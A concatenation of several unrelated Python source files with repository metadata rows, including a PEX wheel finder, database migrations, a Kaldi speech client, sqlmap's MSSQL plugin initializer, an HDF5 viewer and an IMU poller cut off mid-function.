    split_wheelname = wheelname.split('-')
    return '-'.join(split_wheelname[:-3])

  def _setup_prefix(self):
    # Walk up the module path until the containing .whl archive is found,
    # then derive the .dist-info directory name from the wheel filename
    path = self.module_path
    old = None
    while path != old:
      if path.lower().endswith('.whl'):
        self.egg_name = os.path.basename(path)
        # TODO(wickman) Test the regression where we have both upper and lower cased package
        # names.
        self.egg_info = os.path.join(path, '%s.dist-info' % self._split_wheelname(self.egg_name))
        self.egg_root = path
        break
      old = path
      path, base = os.path.split(path)
# See https://bitbucket.org/tarek/distribute/issue/274
class FixedEggMetadata(pkg_resources.EggMetadata):
  """An EggMetadata provider that has functional parity with the disk-based provider."""

  @classmethod
  def normalized_elements(cls, path):
    # Split on '/' and strip trailing empty or '.' components so that
    # 'a/b', 'a/b/' and 'a/b/.' all normalize to the same element list
    path_split = path.split('/')
    while path_split[-1] in ('', '.'):
      path_split.pop(-1)
    return path_split

  def _fn(self, base, resource_name):
    # super() does not work here as EggMetadata is an old-style class.
    original_fn = pkg_resources.EggMetadata._fn(self, base, resource_name)
    return '/'.join(self.normalized_elements(original_fn))

  def _zipinfo_name(self, fspath):
    fspath = self.normalized_elements(fspath)
    zip_pre = self.normalized_elements(self.zip_pre)
    # Bug fix: the original ``assert "...message..."`` asserted a non-empty
    # string constant, which is always true, so the check could never fire
    # and the method silently returned None for non-subpaths. Assert the
    # actual condition, keeping the original message.
    assert fspath[:len(zip_pre)] == zip_pre, (
        "%s is not a subpath of %s" % (fspath, self.zip_pre))
    return '/'.join(fspath[len(zip_pre):])
def wheel_from_metadata(location, metadata):
  """Build a DistInfoDistribution from wheel metadata, or return None when
  the metadata carries no PKG-INFO payload."""
  pkg_info_key = pkg_resources.DistInfoDistribution.PKG_INFO
  if not metadata.has_metadata(pkg_info_key):
    return None

  from email.parser import Parser
  pkg_info = Parser().parsestr(metadata.get_metadata(pkg_info_key))
  return pkg_resources.DistInfoDistribution(
      location=location,
      metadata=metadata,
      # TODO(wickman) Is this necessary or will they get picked up correctly?
      project_name=pkg_info.get('Name'),
      version=pkg_info.get('Version'),
      platform=None)
def find_wheels_on_path(importer, path_item, only=False):
  """Yield distributions for .whl files sitting directly in the directory
  ``path_item``. Yields nothing when ``only`` is set or the directory is
  missing/unreadable."""
  if only or not os.path.isdir(path_item) or not os.access(path_item, os.R_OK):
    return
  for entry in os.listdir(path_item):
    if entry.lower().endswith('.whl'):
      for dist in pkg_resources.find_distributions(os.path.join(path_item, entry)):
        yield dist
def find_eggs_in_zip(importer, path_item, only=False):
  """Yield distributions found inside a zipped egg, recursing into nested
  .egg archives unless ``only`` is set."""
  if importer.archive.endswith('.whl'):
    # Defer to wheel importer
    return
  metadata = FixedEggMetadata(importer)
  if metadata.has_metadata('PKG-INFO'):
    yield pkg_resources.Distribution.from_filename(path_item, metadata=metadata)
  if only:
    return  # don't yield nested distros
  # Recurse into any .egg archives bundled at the top level of this zip
  for subitem in metadata.resource_listdir('/'):
    if subitem.endswith('.egg'):
      subpath = os.path.join(path_item, subitem)
      for dist in find_eggs_in_zip(zipimport.zipimporter(subpath), subpath):
        yield dist
def find_wheels_in_zip(importer, path_item, only=False):
  """Yield the distribution contained in a zipped wheel, if any."""
  dist = wheel_from_metadata(path_item, WheelMetadata(importer))
  if dist:
    yield dist
__PREVIOUS_FINDER = None
def register_finders():
  """Register finders necessary for PEX to function properly.

  Monkeypatches pkg_resources so that zipped and unzipped wheels are found
  by find_distributions, in addition to the default egg support. Idempotent:
  a second call is a no-op until unregister_finders() runs.
  """
  # If the previous finder is set, then we've already monkeypatched, so skip.
  global __PREVIOUS_FINDER
  if __PREVIOUS_FINDER:
    return

  # save previous finder so that it can be restored
  previous_finder = _get_finder(zipimport.zipimporter)
  assert previous_finder, 'This appears to be using an incompatible setuptools.'

  # replace the zip finder with our own implementation of find_eggs_in_zip which uses the correct
  # metadata handler, in addition to find_wheels_in_zip
  pkg_resources.register_finder(
      zipimport.zipimporter, ChainedFinder.of(find_eggs_in_zip, find_wheels_in_zip))

  # append the wheel finder
  _add_finder(pkgutil.ImpImporter, find_wheels_on_path)

  # Python >= 3.3 on CPython uses importlib's FileFinder for path entries
  if importlib_bootstrap is not None:
    _add_finder(importlib_bootstrap.FileFinder, find_wheels_on_path)

  __PREVIOUS_FINDER = previous_finder
def unregister_finders():
  """Unregister finders necessary for PEX to function properly.

  Restores the zipimporter finder saved by register_finders() and removes
  the wheel path finders. No-op if register_finders() was never called.
  """
  global __PREVIOUS_FINDER
  if not __PREVIOUS_FINDER:
    return

  # Restore the original zip finder and drop the wheel finders we added
  pkg_resources.register_finder(zipimport.zipimporter, __PREVIOUS_FINDER)
  _remove_finder(pkgutil.ImpImporter, find_wheels_on_path)

  if importlib_bootstrap is not None:
    _remove_finder(importlib_bootstrap.FileFinder, find_wheels_on_path)

  __PREVIOUS_FINDER = None
| 32.540084
| 98
| 0.74209
|
acff61042be530f5cd425b681e7c51b94fbf048c
| 4,391
|
py
|
Python
|
neutron/db/migration/alembic_migrations/nec_init_ops.py
|
congnt95/neutron
|
6a73a362c5ff5b7c28c15a49f47a9900c0d2b4e1
|
[
"Apache-2.0"
] | 1,080
|
2015-01-04T08:35:00.000Z
|
2022-03-27T09:15:52.000Z
|
neutron/db/migration/alembic_migrations/nec_init_ops.py
|
congnt95/neutron
|
6a73a362c5ff5b7c28c15a49f47a9900c0d2b4e1
|
[
"Apache-2.0"
] | 24
|
2015-02-21T01:48:28.000Z
|
2021-11-26T02:38:56.000Z
|
neutron/db/migration/alembic_migrations/nec_init_ops.py
|
congnt95/neutron
|
6a73a362c5ff5b7c28c15a49f47a9900c0d2b4e1
|
[
"Apache-2.0"
] | 1,241
|
2015-01-02T10:47:10.000Z
|
2022-03-27T09:42:23.000Z
|
# Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Initial operations for NEC plugin
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Create the initial database tables for the NEC plugin."""

    def _create_ofc_mapping_table(table_name):
        # Every OFC id-mapping table has the same two-column layout:
        # a unique OFC identifier keyed by the Neutron UUID.
        op.create_table(
            table_name,
            sa.Column('ofc_id', sa.String(length=255), nullable=False),
            sa.Column('neutron_id', sa.String(length=36), nullable=False),
            sa.PrimaryKeyConstraint('neutron_id'),
            sa.UniqueConstraint('ofc_id'))

    _create_ofc_mapping_table('ofcportmappings')
    _create_ofc_mapping_table('ofcroutermappings')

    # Which provider implements each router.
    op.create_table(
        'routerproviders',
        sa.Column('provider', sa.String(length=255), nullable=True),
        sa.Column('router_id', sa.String(length=36), nullable=False),
        sa.ForeignKeyConstraint(['router_id'], ['routers.id'],
                                ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('router_id'))

    _create_ofc_mapping_table('ofctenantmappings')
    _create_ofc_mapping_table('ofcfiltermappings')
    _create_ofc_mapping_table('ofcnetworkmappings')

    # Packet-filter rules attached to networks/ports.
    op.create_table(
        'packetfilters',
        sa.Column('tenant_id', sa.String(length=255), nullable=True,
                  index=True),
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('name', sa.String(length=255), nullable=True),
        sa.Column('network_id', sa.String(length=36), nullable=False),
        sa.Column('priority', sa.Integer(), nullable=False),
        sa.Column('action', sa.String(length=16), nullable=False),
        sa.Column('in_port', sa.String(length=36), nullable=True),
        sa.Column('src_mac', sa.String(length=32), nullable=False),
        sa.Column('dst_mac', sa.String(length=32), nullable=False),
        sa.Column('eth_type', sa.Integer(), nullable=False),
        sa.Column('src_cidr', sa.String(length=64), nullable=False),
        sa.Column('dst_cidr', sa.String(length=64), nullable=False),
        sa.Column('protocol', sa.String(length=16), nullable=False),
        sa.Column('src_port', sa.Integer(), nullable=False),
        sa.Column('dst_port', sa.Integer(), nullable=False),
        sa.Column('admin_state_up', sa.Boolean(), nullable=False),
        sa.Column('status', sa.String(length=16), nullable=False),
        sa.ForeignKeyConstraint(['network_id'], ['networks.id'],
                                ondelete='CASCADE'),
        sa.ForeignKeyConstraint(['in_port'], ['ports.id'],
                                ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'))

    # OpenFlow switch port details for each Neutron port.
    op.create_table(
        'portinfos',
        sa.Column('id', sa.String(length=36), nullable=False),
        sa.Column('datapath_id', sa.String(length=36), nullable=False),
        sa.Column('port_no', sa.Integer(), nullable=False),
        sa.Column('vlan_id', sa.Integer(), nullable=False),
        sa.Column('mac', sa.String(length=32), nullable=False),
        sa.ForeignKeyConstraint(['id'], ['ports.id'], ondelete='CASCADE'),
        sa.PrimaryKeyConstraint('id'))
| 43.04902
| 78
| 0.638579
|
acff61d6af70a8f8946a1eb95ef0fdd7125e29c1
| 700
|
py
|
Python
|
backend/flask-api/migrations/versions/f172c6d30249_.py
|
lucasbibianot/inova-cnj-time16
|
e621d7027bd462d348e233ffd6ed88648c53704b
|
[
"Apache-2.0"
] | null | null | null |
backend/flask-api/migrations/versions/f172c6d30249_.py
|
lucasbibianot/inova-cnj-time16
|
e621d7027bd462d348e233ffd6ed88648c53704b
|
[
"Apache-2.0"
] | null | null | null |
backend/flask-api/migrations/versions/f172c6d30249_.py
|
lucasbibianot/inova-cnj-time16
|
e621d7027bd462d348e233ffd6ed88648c53704b
|
[
"Apache-2.0"
] | 2
|
2020-10-19T22:03:31.000Z
|
2020-11-29T21:22:33.000Z
|
"""Ajustando campos not null da tb_hist_situacao para null
Revision ID: f172c6d30249
Revises: 2373796f9e26
Create Date: 2020-10-18 17:18:24.491127
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f172c6d30249'        # this migration's id
down_revision = '2373796f9e26'   # the migration this one builds on
branch_labels = None
depends_on = None
def upgrade():
    """Make id_situacao_origem and id_evento nullable by drop-and-recreate."""
    # Plain SQL (Postgres int4): dropping and re-adding the columns loses
    # their data but removes the NOT NULL constraint.
    statements = (
        "alter table tb_hist_situacao drop column id_situacao_origem",
        "alter table tb_hist_situacao drop column id_evento",
        "alter table tb_hist_situacao add column id_situacao_origem int4 null",
        "alter table tb_hist_situacao add column id_evento int4 null",
    )
    for statement in statements:
        op.execute(statement)
def downgrade():
    """Intentional no-op: the NOT NULL constraints are not restored."""
    pass
| 25
| 86
| 0.771429
|
acff626288ec9c5d52921ba97d6f7cdab95e2b1b
| 9,066
|
py
|
Python
|
python/audio_client.py
|
bmilde/ambientsearch
|
74bf83a313e19da54a4e44158063041f981424c9
|
[
"Apache-2.0"
] | 20
|
2016-04-30T11:24:45.000Z
|
2021-11-09T10:39:25.000Z
|
python/audio_client.py
|
bmilde/ambientsearch
|
74bf83a313e19da54a4e44158063041f981424c9
|
[
"Apache-2.0"
] | 1
|
2020-09-23T13:36:58.000Z
|
2020-09-23T13:36:58.000Z
|
python/audio_client.py
|
bmilde/ambientsearch
|
74bf83a313e19da54a4e44158063041f981424c9
|
[
"Apache-2.0"
] | 8
|
2015-10-07T13:40:36.000Z
|
2019-08-07T06:45:24.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Benjamin Milde and Jonas Wacker'
import argparse
from ws4py.client.threadedclient import WebSocketClient
import threading
import sys
import urllib
import Queue
import json
import time
import traceback
import os
from mutagen.mp3 import MP3
from bridge import KeywordClient
std_speaker = "You"
def rate_limited(max_per_second):
    """Decorator factory that throttles calls to *max_per_second* per second.

    The wrapped function sleeps just long enough that successive calls are at
    least ``1 / max_per_second`` seconds apart (wall-clock time).
    """
    min_interval = 1.0 / float(max_per_second)

    def decorate(func):
        # One-element list acts as a mutable cell so the inner function can
        # update the timestamp without `nonlocal` (file targets Python 2).
        last_time_called = [0.0]

        def rate_limited_function(*args, **kargs):
            # Bug fix: the original used time.clock(), which measures CPU
            # time on Unix (so the limiter never actually slept) and was
            # removed in Python 3.8.  Rate limiting needs wall-clock time.
            elapsed = time.time() - last_time_called[0]
            left_to_wait = min_interval - elapsed
            if left_to_wait > 0:
                time.sleep(left_to_wait)
            ret = func(*args, **kargs)
            last_time_called[0] = time.time()
            return ret
        return rate_limited_function
    return decorate
# Returns an audio file's bitrate and length in seconds if file is in mp3-format.
def get_audio_meta_data(path):
    """Return ``{'bitrate': ..., 'length': ...}`` for an audio file.

    Defaults to a 32 kB/s bitrate and zero length.  Only an existing file
    with an ``.mp3`` extension is actually probed (via mutagen's MP3 reader);
    anything else gets the defaults.
    """
    meta_data = {'bitrate': 32000 * 8, 'length': 0}
    if isinstance(path, str) and os.path.isfile(path):
        extension = os.path.splitext(path)[1]
        if extension == '.mp3':
            info = MP3(path).info
            meta_data['bitrate'] = info.bitrate
            meta_data['length'] = info.length
    return meta_data
class KaldiClient(WebSocketClient):
    """WebSocket client that streams an audio file to a Kaldi GStreamer
    server and collects the decoded transcripts.

    Final hypotheses are accumulated in ``self.final_hyps`` and, when a
    keyword-server URL was given, forwarded to a ``KeywordClient``.
    NOTE: this file uses Python 2 print-statement syntax throughout.
    """

    def __init__(self, filename, url, protocols=None, extensions=None, heartbeat_freq=None, byterate=32000,
                 save_adaptation_state_filename=None, send_adaptation_state_filename=None, keyword_server_url='',
                 max_sentences=0):
        super(KaldiClient, self).__init__(url, protocols, extensions, heartbeat_freq)
        self.final_hyps = []            # finished sentence transcripts
        self.fn = filename              # audio file to stream
        self.byterate = byterate        # bytes/sec sent to the server
        self.final_hyp_queue = Queue.Queue()
        self.save_adaptation_state_filename = save_adaptation_state_filename
        self.send_adaptation_state_filename = send_adaptation_state_filename
        self.keyword_client = KeywordClient(keyword_server_url)
        self.keyword_client.reset()
        # Only forward transcripts when a keyword-server URL was provided.
        self.send_to_keywordserver = not (keyword_server_url == '')
        if self.send_to_keywordserver:
            self.keyword_client.addUtterance('', 'You')
        self.last_hyp = ''              # last partial hypothesis shown
        self.max_sentences = max_sentences  # 0 means "no limit"

    # Throttled so audio is sent in quarter-second chunks, 4x per second.
    @rate_limited(4)
    def send_data(self, data):
        self.send(data, binary=True)

    def opened(self):
        # print "Socket opened!"
        # Stream the file from a background thread so the websocket's
        # receive loop is not blocked.
        def send_data_to_ws():
            f = open(self.fn, "rb")
            if self.send_adaptation_state_filename is not None:
                print >> sys.stderr, "Sending adaptation state from %s" % self.send_adaptation_state_filename
                try:
                    adaptation_state_props = json.load(open(self.send_adaptation_state_filename, "r"))
                    self.send(json.dumps(dict(adaptation_state=adaptation_state_props)))
                except:
                    # Best effort: adaptation state is optional.
                    e = sys.exc_info()[0]
                    print >> sys.stderr, "Failed to send adaptation state: ", e
            # Send byterate/4 bytes per chunk; send_data is rate-limited to
            # 4 calls/sec, so this approximates real-time streaming.
            for block in iter(lambda: f.read(self.byterate / 4), ""):
                if self.maximum_sentences_reached():
                    break
                self.send_data(block)
            print >> sys.stderr, "Audio sent, now sending EOS"
            self.send("EOS")

        t = threading.Thread(target=send_data_to_ws)
        t.start()

    # received decoding message from upstream Kaldi server
    def received_message(self, m):
        if self.maximum_sentences_reached():
            return
        try:
            response = json.loads(str(m))
            # print >> sys.stderr, "RESPONSE:", response
            # print >> sys.stderr, "JSON was:", m
            if response['status'] == 0:
                if 'result' in response:
                    trans = response['result']['hypotheses'][0]['transcript']
                    if response['result']['final']:
                        # Drop one-word noise "sentences" before recording.
                        if trans not in ['a.', 'I.', 'i.', 'the.', 'but.', 'one.', 'it.', 'she.']:
                            self.final_hyps.append(trans)
                            if self.send_to_keywordserver:
                                self.keyword_client.replaceLastUtterance(self.last_hyp, trans, std_speaker)
                                self.keyword_client.completeUtterance(trans, std_speaker)
                                self.keyword_client.addUtterance('', std_speaker)
                        self.last_hyp = ''
                        complete_transcript = '\n'.join(sentence[:-1] for sentence in self.final_hyps)
                        print u'\r\033[K', trans.replace(u'\n', u'\\n')
                    else:
                        # Partial hypothesis: update the keyword server and
                        # redraw the current console line in place.
                        if self.send_to_keywordserver:
                            self.keyword_client.replaceLastUtterance(self.last_hyp, trans, std_speaker)
                        self.last_hyp = trans
                        print_trans = trans.replace(u'\n', u'\\n')
                        print u'\r\033[K', print_trans
                if 'adaptation_state' in response:
                    if self.save_adaptation_state_filename:
                        print u'Saving adaptation state to %s' % self.save_adaptation_state_filename
                        with open(self.save_adaptation_state_filename, 'w') as f:
                            f.write(json.dumps(response['adaptation_state']))
            else:
                print u'Received error from server (status %d)' % response['status']
                if 'message' in response:
                    print 'Error message:', response['message']
        except Exception:
            # Never let a malformed message kill the receive loop.
            print 'Exception in received_message'
            exc_type, exc_value, exc_traceback = sys.exc_info()
            traceback.print_exception(exc_type, exc_value, exc_traceback,
                                      limit=10, file=sys.stdout)

    def get_full_hyp(self, timeout=60):
        # NOTE(review): Queue.get's first positional argument is `block`,
        # not `timeout` -- this call blocks indefinitely.  Likely intended:
        # self.final_hyp_queue.get(timeout=timeout).  Verify before fixing.
        return self.final_hyp_queue.get(timeout)

    # Returns True if the maximum number of sentences defined by the user have been transcribed.
    def maximum_sentences_reached(self):
        return self.max_sentences != 0 and len(self.final_hyps) >= self.max_sentences

    def closed(self, code, reason=None):
        # print "Websocket closed() called"
        # print >> sys.stderr
        # Hand the joined transcript to whoever is waiting in get_full_hyp().
        self.final_hyp_queue.put(" ".join(self.final_hyps))
def connect_ws(args):
    """Connect a KaldiClient to the server and print the final transcript.

    Blocks until the requested sentence count is reached or the user hits
    Ctrl-C.  (Python 2 syntax.)
    """
    content_type = args.content_type
    # Raw PCM needs an explicit caps string; rate/2 converts the byte rate
    # back to the sample rate for 16-bit mono audio.
    if content_type == '' and args.audiofile.endswith(".raw"):
        content_type = "audio/x-raw, layout=(string)interleaved, rate=(int)%d, format=(string)S16LE, channels=(int)1"\
            % (args.rate / 2)

    # No rate given: derive bytes/sec from the file's own bitrate.
    if args.rate == 0:
        meta_data = get_audio_meta_data(args.audiofile)
        args.rate = meta_data['bitrate'] / 8
        print "No Bitrate provided. Setting Bitrate to: " + str(args.rate)

    try:
        ws = KaldiClient(args.audiofile, args.uri + '?%s' % (urllib.urlencode([("content-type", content_type)])),
                         byterate=args.rate, save_adaptation_state_filename=args.save_adaptation_state,
                         send_adaptation_state_filename=args.send_adaptation_state,
                         keyword_server_url=args.ambient_uri, max_sentences=args.count)
        ws.connect()
        while not ws.maximum_sentences_reached():
            time.sleep(1)
    except KeyboardInterrupt:
        # NOTE(review): if Ctrl-C arrives before KaldiClient() finishes,
        # `ws` is unbound here and below -- NameError.  Consider binding
        # ws = None before the try block.
        ws.close()
    # Blocks until closed() publishes the joined transcript.
    result = ws.get_full_hyp()
    print result.encode('utf-8')
def main():
    """Build the CLI parser and return the parsed arguments."""
    arg_parser = argparse.ArgumentParser(description='Command line client for kaldigstserver')
    arg_parser.add_argument(
        '-u', '--uri', default="ws://localhost:8100/client/ws/speech", dest="uri",
        help="Server websocket URI")
    arg_parser.add_argument(
        '-a', '--ambient-uri', default='http://localhost:5000/', dest='ambient_uri',
        help='Ambient server websocket URI')
    arg_parser.add_argument(
        '-r', '--rate', default=0, dest="rate", type=int,
        help="Rate in bytes/sec at which audio should be sent to the server."
             "NB! For raw 16-bit audio it must be 2*samplerate!")
    arg_parser.add_argument(
        '-n', '--sentence-number', default=0, dest="count", type=int,
        help="Maximum number of sentences to transcribe.")
    arg_parser.add_argument('--save-adaptation-state', help="Save adaptation state to file")
    arg_parser.add_argument('--send-adaptation-state', help="Send adaptation state from file")
    arg_parser.add_argument(
        '--content-type', default='',
        help="Use the specified content type (empty by default,"
             "for raw files the default is audio/x-raw, layout=(string)interleaved,"
             "rate=(int)<rate>, format=(string)S16LE, channels=(int)1")
    arg_parser.add_argument('audiofile', help="Audio file to be sent to the server")
    return arg_parser.parse_args()
if __name__ == "__main__":
args = main()
connect_ws(args)
| 42.167442
| 118
| 0.599713
|
acff62b99033bb54d9e458300b8373a551090c71
| 1,076
|
py
|
Python
|
Toolz/sqlmap/plugins/dbms/mssqlserver/__init__.py
|
thezakman/CTF-Toolz
|
b369246ea6766165cce0852e537fb6a0c970869b
|
[
"Unlicense"
] | 71
|
2019-02-02T11:38:46.000Z
|
2022-03-31T14:08:27.000Z
|
tools/sqlmap/plugins/dbms/mssqlserver/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | null | null | null |
tools/sqlmap/plugins/dbms/mssqlserver/__init__.py
|
sravani-m/Web-Application-Security-Framework
|
d9f71538f5cba6fe1d8eabcb26c557565472f6a6
|
[
"MIT"
] | 15
|
2019-08-07T06:32:04.000Z
|
2022-03-09T12:48:20.000Z
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import DBMS
from lib.core.settings import MSSQL_SYSTEM_DBS
from lib.core.unescaper import unescaper
from plugins.dbms.mssqlserver.enumeration import Enumeration
from plugins.dbms.mssqlserver.filesystem import Filesystem
from plugins.dbms.mssqlserver.fingerprint import Fingerprint
from plugins.dbms.mssqlserver.syntax import Syntax
from plugins.dbms.mssqlserver.takeover import Takeover
from plugins.generic.misc import Miscellaneous
class MSSQLServerMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):
    """
    This class defines Microsoft SQL Server methods.

    It aggregates the MSSQL-specific mixins (syntax, fingerprinting,
    enumeration, filesystem access, takeover) into a single DBMS handler.
    """

    def __init__(self):
        # System databases are excluded from enumeration by default.
        self.excludeDbsList = MSSQL_SYSTEM_DBS

        # Initialize each mixin explicitly; presumably they do not chain
        # via super() -- TODO confirm against the mixin sources.
        Syntax.__init__(self)
        Fingerprint.__init__(self)
        Enumeration.__init__(self)
        Filesystem.__init__(self)
        Miscellaneous.__init__(self)
        Takeover.__init__(self)

# Register the MSSQL-specific escaping routine with the global unescaper.
unescaper[DBMS.MSSQL] = Syntax.escape
| 31.647059
| 92
| 0.76487
|
acff630be4085958761468db65360904aa1355d7
| 3,536
|
py
|
Python
|
psana/psana/graphqt/H5VMain.py
|
valmar/lcls2
|
1c24da076a8cd252cf6601e125dd721fd2004f2a
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
psana/psana/graphqt/H5VMain.py
|
valmar/lcls2
|
1c24da076a8cd252cf6601e125dd721fd2004f2a
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
psana/psana/graphqt/H5VMain.py
|
valmar/lcls2
|
1c24da076a8cd252cf6601e125dd721fd2004f2a
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
"""Class :py:class:`H5VMain` is a QWidget for main window of hdf5viewer
========================================================================
Usage ::
# Run test: python lcls2/psana/psana/graphqt/H5VMain.py
from psana.graphqt.H5VMain import H5VMain
See method: hdf5explorer
Created on 2019-11-12 by Mikhail Dubrovin
"""
import logging
#logger = logging.getLogger(__name__)
import sys
from PyQt5.QtWidgets import QApplication, QWidget, QHBoxLayout, QVBoxLayout, QSplitter, QTextEdit
from psana.graphqt.QWLoggerStd import QWLoggerStd
from psana.graphqt.H5VControl import H5VControl
from psana.graphqt.H5VQWTree import Qt, H5VQWTree
from psana.graphqt.CMConfigParameters import cp
from psana.pyalgos.generic.Utils import print_kwargs, is_in_command_line
from psana.detector.RepoManager import RepoManager
class H5VMain(QWidget):
    """Main window of the hdf5viewer: a control bar above a splitter that
    holds the HDF5 tree widget and (optionally) the log widget."""

    def __init__(self, **kwargs):
        QWidget.__init__(self, parent=None)
        # Global registration so other widgets can reach the main window.
        cp.h5vmain = self

        self.proc_kwargs(**kwargs)
        logdir = cp.log_prefix.value()
        kwargs['parent'] = self
        # Reuse an externally supplied logger widget when one exists.
        self.wlog = kwargs.get('wlog', cp.wlog)
        if self.wlog is None: self.wlog = QWLoggerStd(cp, show_buttons=False)
        self.wtree = H5VQWTree(**kwargs)
        self.wctrl = H5VControl(**kwargs)
        self.wtree.wctrl = self.wctrl

        # Tree on the left; logger on the right only when locally created.
        self.hspl = QSplitter(Qt.Horizontal)
        self.hspl.addWidget(self.wtree)
        if cp.wlog is None: self.hspl.addWidget(self.wlog)

        self.vbox = QVBoxLayout()
        self.vbox.addWidget(self.wctrl)
        self.vbox.addWidget(self.hspl)
        self.setLayout(self.vbox)

        self.set_style()
        self.set_tool_tips()

        # Optionally record this invocation in the repository log.
        if kwargs.get('rec_at_start', False):
            RepoManager(logdir, dettype=None).\
                save_record_at_start(sys.argv[0].rsplit('/')[-1])

        #self.connect_signals_to_slots()

    def proc_kwargs(self, **kwargs):
        """Push logging-related kwargs into the global config parameters."""
        print_kwargs(kwargs)
        loglevel = kwargs.get('loglevel', 'DEBUG').upper()
        logdir = kwargs.get('logdir', './')
        savelog = kwargs.get('savelog', False)
        # Command-line -l/--loglevel takes precedence over the kwarg.
        if is_in_command_line('-l', '--loglevel'): cp.log_level.setValue(loglevel)
        cp.log_prefix.setValue(logdir)
        cp.save_log_at_exit.setValue(savelog)

    def connect_signals_to_slots(self):
        # Placeholder: no signal/slot wiring is active.
        pass
        #self.connect(self.wbut.but_reset, QtCore.SIGNAL('clicked()'), self.on_but_reset)
        #self.connect(self.wbut.but_save, QtCore.SIGNAL('clicked()'), self.on_but_save)

    def set_tool_tips(self):
        self.setToolTip('hdf5 explorer')

    def set_style(self):
        # Default geometry; overridden by the caller in hdf5explorer().
        self.setGeometry(50, 50, 500, 600)
        self.layout().setContentsMargins(0,0,0,0)
        self.wctrl.setFixedHeight(50)

    def closeEvent(self, e):
        QWidget.closeEvent(self, e)
        # Drop the global registration made in __init__.
        cp.h5vmain = None
def hdf5explorer(**kwargs):
    """Create the Qt application, show an H5VMain window, and block until
    the window is closed.  kwargs are forwarded to H5VMain."""
    import os
    # Presumably works around GL rendering issues (e.g. over X forwarding)
    # -- TODO confirm.
    os.environ['LIBGL_ALWAYS_INDIRECT'] = '1'
    #fmt = '%(asctime)s %(name)s %(levelname)s: %(message)s'
    #logging.basicConfig(format=fmt, datefmt='%H:%M:%S', level=logging.DEBUG)
    a = QApplication(sys.argv)
    w = H5VMain(**kwargs)
    w.setGeometry(10, 25, 900, 700)
    w.setWindowTitle('HDF5 explorer')
    w.move(50,20)
    w.show()
    # Blocks until the window is closed.
    a.exec_()
    del w
    del a
if __name__ == "__main__":
import os
kwargs = {\
'fname':'/reg/g/psdm/detector/calib/jungfrau/jungfrau-171113-154920171025-3d00fb.h5',\
'loglevel':'INFO',\
'logdir':'%s/hdf5explorer-log' % os.path.expanduser('~'),\
'savelog':True}
hdf5explorer(**kwargs)
# EOF
| 27.84252
| 97
| 0.643382
|
acff635a9356376981eb427f1dadbfbaf1960627
| 284
|
py
|
Python
|
spinta/backends/mongo/commands/wait.py
|
atviriduomenys/spinta
|
77a10e201f8cdc63143fce7996fd0898acb1ff58
|
[
"MIT"
] | 2
|
2019-03-14T06:41:14.000Z
|
2019-03-26T11:48:14.000Z
|
spinta/backends/mongo/commands/wait.py
|
sirex/spinta
|
77a10e201f8cdc63143fce7996fd0898acb1ff58
|
[
"MIT"
] | 44
|
2019-04-05T15:52:45.000Z
|
2022-03-30T07:41:33.000Z
|
spinta/backends/mongo/commands/wait.py
|
sirex/spinta
|
77a10e201f8cdc63143fce7996fd0898acb1ff58
|
[
"MIT"
] | 1
|
2019-04-01T09:54:27.000Z
|
2019-04-01T09:54:27.000Z
|
from spinta import commands
from spinta.components import Context
from spinta.backends.mongo.components import Mongo
@commands.wait.register(Context, Mongo)
def wait(context: Context, backend: Mongo, *, fail: bool = False) -> bool:
    """Report whether the Mongo backend is available.

    Currently always returns True; no connectivity check is performed.
    """
    # TODO: Implement real check.
    return True
| 28.4
| 74
| 0.757042
|
acff644eecaed3792f8b009bc35d4cc81fbf76c1
| 1,549
|
py
|
Python
|
gps_tracker/imu_poller.py
|
jaluebbe/GPSTracker
|
987505d80b141feaf1dc9a8a7568d3a531c8c337
|
[
"MIT"
] | 7
|
2020-09-16T14:24:25.000Z
|
2021-11-02T00:19:37.000Z
|
gps_tracker/imu_poller.py
|
jaluebbe/GPSTracker
|
987505d80b141feaf1dc9a8a7568d3a531c8c337
|
[
"MIT"
] | null | null | null |
gps_tracker/imu_poller.py
|
jaluebbe/GPSTracker
|
987505d80b141feaf1dc9a8a7568d3a531c8c337
|
[
"MIT"
] | 4
|
2020-08-20T14:21:27.000Z
|
2021-05-15T02:31:05.000Z
|
#!/usr/bin/env python3
import time
import math
import json
import socket
import redis
import RTIMU
import os.path
import logging
# Module-level setup: Redis connection, RTIMULib settings, and IMU init.
# The process exits when the IMU cannot be initialized.
redis_connection = redis.Redis()
hostname = socket.gethostname()

# RTIMULib appends ".ini" to this path itself.
SETTINGS_FILE = "/home/pi/GPSTracker/gps_tracker/RTIMULib"

logging.info("Using settings file " + SETTINGS_FILE + ".ini")
if not os.path.exists(SETTINGS_FILE + ".ini"):
    logging.warning("Settings file does not exist, will be created")

s = RTIMU.Settings(SETTINGS_FILE)
imu = RTIMU.RTIMU(s)

logging.info("IMU Name: " + imu.IMUName())

if not imu.IMUInit():
    logging.error("IMU Init Failed")
    exit(1)
else:
    logging.info("IMU Init Succeeded")
    # this is a good time to set any fusion parameters
    imu.setSlerpPower(0.02)
    imu.setGyroEnable(True)
    imu.setAccelEnable(True)
    imu.setCompassEnable(False)

# Driver-recommended polling period, in milliseconds.
poll_interval = imu.IMUGetPollInterval()
logging.info("Recommended Poll Interval: %dmS\n" % poll_interval)
def poll_imu(counter=0):
    """Poll the IMU once and publish roll/pitch to Redis every 20th read.

